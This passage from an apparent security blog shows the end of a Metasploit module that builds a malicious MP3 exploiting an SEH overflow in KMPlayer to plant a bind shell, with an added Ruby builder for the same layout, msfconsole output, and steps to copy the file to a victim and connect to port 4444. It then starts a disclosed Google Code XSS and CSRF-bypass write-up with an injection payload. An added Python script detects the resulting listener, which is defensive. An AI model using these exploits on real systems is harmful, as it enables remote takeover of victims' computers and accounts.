style="mso-tab-count: 1;"> </span><span style="mso-tab-count: 1;"> </span>], self.class)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>end</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>def exploit</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>print_status("Creating '#{datastore['FILENAME']}' file ...")</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>header = 
"\x77\x44\x37\x03\x00\x00\x00\x00\x1F\x76\x54\x49\x54\x32\x00\x00\x13\x16\x00\x00\x00\xD6\x6D\x61\x73\x68\x69\x6E\x67\x20\x54\x68\x65\x20\x4F\x70\x70\xFA\x6E\x52\xCC\x74\x86\x41\x4C\x42\x00\x00\x00\x15\x00\x00\x00\xE7\x65\xE1\x65\x6E\x64\x20\x4F\x66\x20\x54\x68\x65\x20\x42\x6C\x61\x63\x6B\x20\xE3\x68\x61\x77\xEF\x72\x6D\x61\x54\x52\x13\x4B\x70\x00\x00\x3E\x00\x00\x00\x34\x8C\xA5\x45\x52\x73\x00\x00\x05\x00\x00\xD2\x32\xDC\x30\x39\x54\x43\x4F\x4E\x00\x00\x00\x0C\x00\x00\x00\x1A\x50\x79\x63\x16\x65\x64\x65\x6C\x69\x9B\x65\x60\x69\x4D\x81\x00\x00\x3C\x00\x32\x00\xEC\x6E\x67\xCD\x55\x50\x45\x54\x45\x4E\x43\x63\x00\x00\xEB\x00\x00\x70\x4C\x61\x6D\x65\x20\x33\x2E\x7A\x37\x54\x4C\x41\x4E\x00\x96\x00\x08\x00\x00\x00\x45\x79\x67\x6F\x69\x73\x68\x50\x7C\x49\x56\x00\x99\xDB\x29\x00\x00\x57\x4D\x3C\x4D\x54\xDB\x69\x61\x43\x6C\x61\x73\x85\x53\x65\xDB\x6F\xE1\x64\x61\x72\x79\x68\x44\xF6\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xAE\x00\x00\x00\x00\x00\x50\x52\x49\xCF\x00\x00\xE6\x27\x00\x00\x57\x4D\x2F\x4D\x65\xE6\x69\x61\x43\x6C\x61\x73\x73\x50\x32\x69\xC0\x61\x72\x79\xC0\x44\x00\xBC\x51\x4D\x30\x23\xE3\xE2\x4B\x86\xA1\x48\xA2\xB0\x28\x44\x1E\x50\x52\x49\x56\x00\x00\x00\xAA\x0B\x00\x57\x9A\x2F\x50\x72\x6F\x1E\x69\x50\xA1\x72\x00\xC3\x00\x4D\x00\x47\x79\x00\x00\x50\x52\x49\x56\x00\x00\x00\x1F\x00\x00\x57\x6C\x2F\x57\x4D\x4E\x6F\x6E\x74\x65\x6E\xF7\x49\x44\x00\x03\x6A\x21\x12\x66\x52\x4D\x49\x93\x83\xD6\x39\xB3\x6E\x1A\x76\xA6\x52\x49\x56\xC2\x20\x00\x57\x00\x00\xA2\x4D\x2F\x57\x59\x43\x25\x6C\x6C\x65\x0C\x74\xE2\x8E\x6E\x1F\x44\x01\xEC\x4B\xF3\xAB\xEB\x1C\xD1\x4C\xBF\x29\x8F\x8D\xC3\x7D\xA2\x74\x50\x52\x49\xC3\x00\x4E\x00\x27\x83\x00\x57\x4D\x2F\x57\x4D\x43\x6F\x6C\x6C\xC6\x63\x74\x69\x6F\x6E\x47\x72\x6F\x75\x70\x49\x44\x00\xEC\xFA\xF3\xAB\xEC\x1C\xD1\x4C\x90\x22\x8F\x8D\xC3\x06\xA2\x0F\x54\x50\x55\x42\x00\x00\x38\x08\x00\x50\x00\x48\x59\xEE\x6D\x65\x67\x61\x50\x1F\x49\x56\x00\x00\x00\x23\x00\x00\x57\x4D\x2F\x9B\x6E\xB4\x71\x75\xE0\x46\x69\x6C\x65\x49\x64\x65\x6E\x74\x69\x66\x69\x6
5\xEB\x00\x41\x00\x4D\x00\x47\x00\x61\x00\x0B\x00\x69\x00\x64\x00\x3D\x00\x52\x00\x20\x00\x20\x00\x31\x00\x17\x00\x37\x00\x32\x00\x34\x00\x37\x00\x34\xFD\xB5\x00\x55\x00\x4D\x00\x47\xCE\x70\x62\x5F\xAB\x69\x2F\x64\x00\x3D\x00\x50\x00\x20\x00\x20\x00\x20\xA6\x34\x00\x37\x6C\x35\x0E\x32\x00\x39\x00\x30\x00\xCE\xBB\x41\x00\x2A\x00\x47\x00\x74\x80\x5F\x00\x71\x00\x64\x00\x3D\x00\x3E\x04\x7C\x00\x31\x00\x37\x00\x36\x00\xBC\x00\x31\x00\xA7\xC0\x32\x8E\x33\x00\x00\x00\x54\x50\x45\x32\x00\x7C\x50\x12\x00\x17\xAE\x49\x6E\x66\x5E\xCB\x74\x65\xAC\x20\x4D\x75\x73\x68\x72\x6F\x6F\x6D\x54\x43\x4F\x4D\x40\x00\x00\x23\x00\x00\xA0\xCB\x6D\x69\x74\x64\xD0\x10\x75\x76\x49\x65\x76\x9F\xCB\x96\x75\x76\x1E\x65\x76\x61\x6E\x69\x2F\x45\x72\xBC\x7A\x20\x45\x69\xB5\x65\x6E\x54\x50\xF8\x31\x00\x00\x00\x25\x00\x00\x47\x49\x6E\x66\x65\x63\x74\x65\x64\x20\x4D\x75\x1E\x68\x72\x6F\x6D\x6F\x56\x20\x20\x73\x4A\x20\x6E\x6F\x9C\x61\x61\x68\x20\x6E\x61\x7E\x69\x76\x00\xDB\x00\x00\x00\x00\x00\x00\x00\x00\x00\x82\x00\x24\x00\x00\x00\x00\x00\x00\x00\x75\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xA2\x00\x00\x9D\x00\x00\x00\x00\x7F\xEB\x79\x82\x00\x75\x00\x00\x00\xDF\x00\x00\x00\x00\x00\x93\x00\x00\x00\x00\xF4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x52\x00\x00\xCA\x00\x00\x00\x00\xE5\x00\x00\xEA\xAF\x00\xFE\x00\x00\x00\x00\x00\x00\x00\x00\x00\x4D\x00\x00\x00\x00\x00\x00\x15\x00\xB3\x00\x00\x00\xC4\x50\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x00\xEA\x00\x00\x00\x00\x66\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x78\x00\x00\x2F\x00\x10\x00\x00\x00\x00\x00\xC8\x00\x00\x00\x00\x00\x00\x00\x00\xE4\x00\x00\x00\x00\x00\x2C\x7E\x00\x00\x00\x00\x00\x00\x56\x00\x00\x00\x00\x00\x00\x6F\x00\x00\xEC\x00\x00\x00\x40\x00\x83\x57\x00\x88\x00\x00\x00\x11\x00\x81\x00\x00\x00\x00\xBC\x00\x00\x00\x00"</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; 
font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer = rand_text(target['Offset'])<span style="mso-tab-count: 1;"> </span>#junk</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << generate_seh_record(target.ret)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << make_nops(30)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>buffer << payload.encoded<span style="mso-tab-count: 1;"> </span>#1652 bytes of space</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>filecontent = header + buffer</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 
0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>print_status("Writing payload to file")</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><br />
</div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span>file_create(filecontent)</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 2;"> </span></span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;"><span style="mso-tab-count: 1;"> </span>end</span></div><div class="MsoNormal" style="background: #BFBFBF; mso-background-themecolor: background1; mso-background-themeshade: 191; text-indent: 0in;"><span style="font-family: "Courier New"; font-size: 8.0pt;">end</span></div><div class="MsoNormal" style="text-align: justify; text-indent: 0in;"><br />
</div><span style="font-family: "Calibri","sans-serif"; font-size: 11.0pt; mso-ansi-language: EN-US; mso-bidi-font-family: "Times New Roman"; mso-bidi-language: EN-US; mso-bidi-theme-font: minor-bidi; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin;">Copy this file into Metasploit's ‘exploits’ module tree so the framework loads it as a module. On BackTrack 5 the directory is </span><span style="background: #BFBFBF; font-family: "Courier New"; font-size: 8.0pt; mso-ansi-language: EN-US; mso-bidi-language: EN-US; mso-fareast-font-family: Calibri; mso-fareast-language: EN-US; mso-fareast-theme-font: minor-latin; mso-shading-themecolor: background1; mso-shading-themeshade: 191;">/pentest/exploits/framework3/modules/exploits/windows/fileformat/</span><br />
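<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The exploit method above assembles the file as header + junk + SEH record + NOP sled + payload. The Ruby script below is an added example, not the blog's module and not Metasploit code: it builds that same layout without the framework, using the module's Offset, Ret and BadChars values, so the SEH record bytes and their position in the file can be checked before the file is ever handed to the player. The ID3 header and the int3 payload in it are stand-ins (assumptions made so the script runs offline), not the module's trigger bytes and not a real shell.</div>

```ruby
#!/usr/bin/env ruby
# Added example (not the blog's module): builds the same on-disk layout the
# Metasploit module writes, without the framework, so the pieces that
# generate_seh_record / make_nops / payload.encoded hide can be inspected:
#
#   [container header][junk: Offset bytes][nSEH 4][SEH 4][NOP sled][payload]
#
# Offset, Ret and BadChars are the module's values.  HEADER and the payload
# are stand-ins chosen so the script runs offline; the real trigger bytes
# are the module's hardcoded `header`, which is not reproduced here.

BADCHARS = "\x00\x0a\x0d".b     # module's BadChars
OFFSET   = 3314                 # module's Offset: junk before the SEH record
RET      = 0x1101dd36           # module's Ret: pop esi / pop ebx / ret 10 in bass.dll
NOP_SLED = 30                   # module: make_nops(30)

# Placeholder 10-byte ID3v2.3 header with a zero tag size (assumption: the
# module's real header is a crafted ID3 block of several hundred bytes).
HEADER = "ID3\x03\x00\x00\x00\x00\x00\x00".b

# Conventional 8-byte SEH record: nSEH = short jump over the record
# (EB 06 = jmp $+8) padded with two NOPs; SEH = handler address, little-endian.
# When the exception fires, SEH is called (pop/pop/ret), which returns into
# nSEH; its jump skips the handler address and lands on the NOP sled.
def seh_record(ret)
  "\xeb\x06\x90\x90".b + [ret].pack('V')
end

# True if any byte of data is in the bad-character set.
def badchars?(data, bad = BADCHARS)
  set = bad.bytes
  data.each_byte.any? { |b| set.include?(b) }
end

# Random filler that avoids the bad characters (the junk before the record).
def filler(len, bad = BADCHARS)
  alphabet = (0..255).to_a - bad.bytes
  Array.new(len) { alphabet.sample }.pack('C*')
end

# Assemble the file: header + junk + SEH record + sled + payload.
# Raises if the return address or payload would be mangled by the parser.
def build_file(payload, offset: OFFSET, ret: RET, nops: NOP_SLED, header: HEADER)
  raise ArgumentError, 'return address contains a bad char' if badchars?([ret].pack('V'))
  raise ArgumentError, 'payload contains a bad char' if badchars?(payload)

  buf = filler(offset)
  buf << seh_record(ret)
  buf << ("\x90".b * nops)
  buf << payload.b
  header + buf
end

# File offset at which the SEH record starts; handy when checking the layout
# under a debugger (the bytes there should read EB 06 90 90 36 DD 01 11).
def seh_position(header: HEADER, offset: OFFSET)
  header.bytesize + offset
end

if __FILE__ == $0
  # Constructed test payload: 16 int3 instructions.  Opening the file under a
  # debugger should break here, proving the SEH chain works before a real
  # payload (e.g. shell_bind_tcp from msfvenom) is dropped in.
  payload = "\xcc".b * 16
  data = build_file(payload)
  File.binwrite(ARGV[0], data) if ARGV[0]
  printf("built %d bytes; SEH record at file offset 0x%x\n", data.bytesize, seh_position)
end
```

<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Run it with an output path to write the file, open the result in the player under a debugger and confirm execution stops on the int3 block at the expected offset; only then swap in a real payload generated with the same bad-character list (for example msfvenom with -b '\x00\x0a\x0d'). Keeping the bad-char check on both the return address and the payload is what catches the usual failure mode, a null or newline that the parser truncates on before the SEH record is reached.</div>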
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Start Metasploit with the <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">msfconsole</span> command, select this exploit module, set the payload to <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">windows/shell_bind_tcp</span> and run the <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">exploit</span> command. This writes the malicious MP3 file; once that file is opened in KMPlayer, the SEH overflow is triggered and the payload starts listening on the port set in the payload options.</div>
<pre style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">
root@bt:~# msfconsole

                _                  _       _  _
               | |                | |     (_) |
 _ __ ___   ___| |_ __ _ ___ _ __ | | ___  _| |_
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __|
| | | | | |  __/ || (_| \__ \ |_) | | (_) | | |_
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__|
                            | |
                            |_|


       =[ metasploit v3.8.0-dev [core:3.8 api:1.0]
+ -- --=[ 708 exploits - 359 auxiliary - 57 post
+ -- --=[ 224 payloads - 27 encoders - 8 nops
       =[ svn r13044 updated today (2011.06.28)

msf > use exploit/windows/fileformat/km_player_mp3_seh
msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mp3          yes       mp3 file


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English VMware


msf exploit(km_player_mp3_seh) > set PAYLOAD windows/shell_bind_tcp
PAYLOAD => windows/shell_bind_tcp
msf exploit(km_player_mp3_seh) > show options

Module options (exploit/windows/fileformat/km_player_mp3_seh):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   FILENAME  msf.mp3          yes       mp3 file


Payload options (windows/shell_bind_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process, none
   LPORT     4444             yes       The listen port
   RHOST                      no        The target address


Exploit target:

   Id  Name
   --  ----
   0   Windows XP SP3 English VMware


msf exploit(km_player_mp3_seh) > exploit

[*] Creating 'msf.mp3' file ...
[*] Writing payload to file
[*] Generated output file /root/.msf3/data/exploits/msf.mp3
msf exploit(km_player_mp3_seh) >
</pre>
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">The file named ‘msf.mp3’ is created at <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">/root/.msf3/data/exploits/msf.mp3</span>. Copy this file to the victim machine and open it in KMPlayer. The application does not crash, but the SEH overflow has been exploited and the victim machine now listens on port 4444; connecting to that port spawns a shell.</div>
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-sShNZJTysDQ/Tgwo37GCQfI/AAAAAAAAAVw/Kmu2m9nrWs4/s1600/shell.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="163" src="http://3.bp.blogspot.com/-sShNZJTysDQ/Tgwo37GCQfI/AAAAAAAAAVw/Kmu2m9nrWs4/s400/shell.jpg" width="400" /></a></div>
<br />
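<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">From the defender's side, the tell-tale of this payload is the one the post itself describes: the media player keeps running and, for no legitimate reason, starts accepting TCP connections on LPORT (4444 here). The Python script below is an added example, not code from this post or from Metasploit. It parses Windows <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">netstat -ano</span> and <span style="background: #BFBFBF; font-family: 'Courier New', Courier, monospace; font-size: 8.0pt;">tasklist</span> output and reports any document or media viewer process that owns a listening TCP socket. The netstat and tasklist text in the script is constructed sample output with made-up PIDs, and the set of viewer image names is an assumption to be extended for your own environment.</div>

```python
"""
Added example (not from the original post): flag a viewer/player process that
has opened a listening TCP socket, which is how a bind-shell payload such as
windows/shell_bind_tcp shows up on the victim after the crafted MP3 is opened.
The sample netstat/tasklist text is constructed; PIDs and sizes are made up.
"""
import re

# Constructed sample of Windows `netstat -ano` output (not real capture data).
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       908
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    0.0.0.0:4444           0.0.0.0:0              LISTENING       1764
  TCP    192.168.56.101:139     0.0.0.0:0              LISTENING       4
  TCP    192.168.56.101:1045    192.168.56.1:445       ESTABLISHED     4
  UDP    0.0.0.0:500            *:*                                    640
"""

# Constructed sample of Windows `tasklist` output (not real capture data).
SAMPLE_TASKLIST = """\
Image Name                     PID Session Name        Session#    Mem Usage
========================= ======== ================ =========== ============
System                           4 Console                    0         236 K
svchost.exe                    908 Console                    0       4,912 K
lsass.exe                      640 Console                    0       1,288 K
KMPlayer.exe                  1764 Console                    0      32,116 K
"""

# Assumption: image names of viewers/players that should never accept inbound
# TCP connections. Extend this set for the software present on your hosts.
VIEWER_IMAGES = {"kmplayer.exe"}

# One `netstat -ano` line in LISTENING state: proto, local addr:port, remote,
# state, PID. Groups: 1 = local address, 2 = local port, 3 = PID.
NETSTAT_LISTEN_RE = re.compile(
    r"^\s*TCP\s+(\S+):(\d+)\s+\S+\s+LISTENING\s+(\d+)\s*$", re.MULTILINE
)

# One `tasklist` data row. Image names containing spaces are not handled by
# this simplified pattern. Groups: 1 = image name, 2 = PID.
TASKLIST_ROW_RE = re.compile(
    r"^(\S+)\s+(\d+)\s+\S+\s+\d+\s+[\d,]+ K\s*$", re.MULTILINE
)


def parse_listeners(netstat_text):
    """Map PID to the list of (local_address, port) TCP sockets it has in LISTENING state."""
    listeners = {}
    for m in NETSTAT_LISTEN_RE.finditer(netstat_text):
        pid = int(m.group(3))
        listeners.setdefault(pid, []).append((m.group(1), int(m.group(2))))
    return listeners


def parse_tasklist(tasklist_text):
    """Map PID to its lower-cased image name."""
    return {int(m.group(2)): m.group(1).lower() for m in TASKLIST_ROW_RE.finditer(tasklist_text)}


def find_viewer_listeners(netstat_text, tasklist_text, viewer_images=VIEWER_IMAGES):
    """Return sorted (image, pid, port) tuples for viewer processes owning a TCP listener.

    Keying on the owning process rather than on a fixed port means the check
    still fires when the payload's LPORT is changed from the default 4444.
    """
    listeners = parse_listeners(netstat_text)
    images = parse_tasklist(tasklist_text)
    findings = []
    for pid, sockets in listeners.items():
        image = images.get(pid)
        if image in viewer_images:
            for _addr, port in sockets:
                findings.append((image, pid, port))
    return sorted(findings)


if __name__ == "__main__":
    for image, pid, port in find_viewer_listeners(SAMPLE_NETSTAT, SAMPLE_TASKLIST):
        print(f"ALERT: {image} (PID {pid}) is listening on TCP port {port}")
```

<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">On a live host the same two parsers can be fed the real command output; the check is cheap enough to run from a scheduled task or an endpoint script. Using the socket's owning process as the signal, rather than a fixed port number, is what makes the rule survive a changed LPORT.</div>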
<!--[if gte mso 9]><xml> <w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="267"> <w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/> <w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/> <w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/> <w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/> <w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/> <w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/> <w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/> <w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/> <w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/> <w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/> <w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/> <w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/> <w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/> <w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/> <w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/> <w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/> <w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/> <w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/> <w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/> <w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/> <w:LsdException Locked="false" Priority="37" Name="Bibliography"/> <w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/> </w:LatentStyles> </xml><![endif]--><!--[if gte mso 10]> <style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-qformat:yes;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin-top:0in;
mso-para-margin-right:0in;
mso-para-margin-bottom:10.0pt;
mso-para-margin-left:0in;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
font-family:"Calibri","sans-serif";
mso-ascii-font-family:Calibri;
mso-ascii-theme-font:minor-latin;
mso-hansi-font-family:Calibri;
mso-hansi-theme-font:minor-latin;}
</style> <![endif]--> <br />
<div class="MsoNormal" style="text-align: justify; text-indent: 0in;">Connect to the victim machine on port 4444 & Game Over!!!</div><br />
<div class="MsoNormal" style="text-align: justify;"></div><div class="MsoNormal" style="text-align: justify;"><span style="font-family: "Calibri","sans-serif"; font-size: 11pt;"></span></div>AMol NAikhttp://www.blogger.com/profile/03701068634043898539noreply@blogger.com13tag:blogger.com,1999:blog-1544325078740292092.post-80489122525456969712011-05-29T23:20:00.000-07:002011-05-29T23:25:23.829-07:00CSRF Protection bypass with XSS in Google Code<div dir="ltr" style="text-align: left;" trbidi="on">In my earlier post, I discussed the “Self-Only” XSS exploitation in Google Code. Today I’m going to discuss how I was able to bypass CSRF protection using an XSS vulnerability in Google Code. The attacker was able to delete the projects of an authenticated victim from the Google Code Project Hosting server. As this bug has been fixed by Google, I’m disclosing it here.<br />
<br />
<b>Cross-site Scripting Vulnerability:</b><br />
<br />
Google Code hosts example code for the various Google APIs. One of them is the Google Books Search API. The vulnerable page is at <br />
<a href="http://code.google.com/apis/books/docs/viewer/examples/book-dataapi-titlesearch.html">http://code.google.com/apis/books/docs/viewer/examples/book-dataapi-titlesearch.html</a><br />
<br />
This page shows the embedded book that matched the search term.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-3qmy4y085wU/TeM0J-ZlFHI/AAAAAAAAAR4/3lNhi_b6ZGo/s1600/vulnerable-page.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="213" src="http://2.bp.blogspot.com/-3qmy4y085wU/TeM0J-ZlFHI/AAAAAAAAAR4/3lNhi_b6ZGo/s320/vulnerable-page.JPG" width="320" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div>When a book is requested, the page makes a JSON request to the Google Books Data API and displays the first matching result in the embedded viewer. The problem is that, while processing the request, the page echoes the user’s query back into a status message on the page.<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-2duaJzEQ2FY/TeM0UeGmaVI/AAAAAAAAAR8/96nAiyy4jtM/s1600/vulnerable-page1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="109" src="http://4.bp.blogspot.com/-2duaJzEQ2FY/TeM0UeGmaVI/AAAAAAAAAR8/96nAiyy4jtM/s320/vulnerable-page1.JPG" width="320" /></a></div><br />
So when the book “<span style="background-color: #999999;"><img src=1 onerror='alert(document.domain)'></span>” is requested, the page writes the query back without sanitizing it, the browser executes the injected JavaScript, and the page is therefore vulnerable to cross-site scripting.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-WjRw1hCvwgY/TeM0bqQh5dI/AAAAAAAAASA/RSg2Izt9Km8/s1600/vulnerable-page2.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="169" src="http://3.bp.blogspot.com/-WjRw1hCvwgY/TeM0bqQh5dI/AAAAAAAAASA/RSg2Izt9Km8/s320/vulnerable-page2.JPG" width="320" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />
<br />
<b>XSS Exploitation:</b><br />
<br />
To exploit this vulnerability, I used the HTML5 Drag-and-Drop API combined with clickjacking. Krzysztof Kotowicz has explained this technique very well in his <a href="http://blog.kotowicz.net/2011/03/exploiting-unexploitable-xss-with.html">blog post</a>. I used his “Alphabet Hero” PoC together with <a href="http://www.beakkon.com/tutorial/html5/drag-and-drop">this</a> HTML5 Drag-and-Drop tutorial.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-42LMW5_hC0Q/TeM0lEs3bqI/AAAAAAAAASE/e0rpKoGtlG0/s1600/poc1.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="128" src="http://3.bp.blogspot.com/-42LMW5_hC0Q/TeM0lEs3bqI/AAAAAAAAASE/e0rpKoGtlG0/s320/poc1.JPG" width="320" /></a></div><br />
<br />
This is basically a drag-and-drop game in which the user is asked to put garbage into a dustbin.<br />
<br />
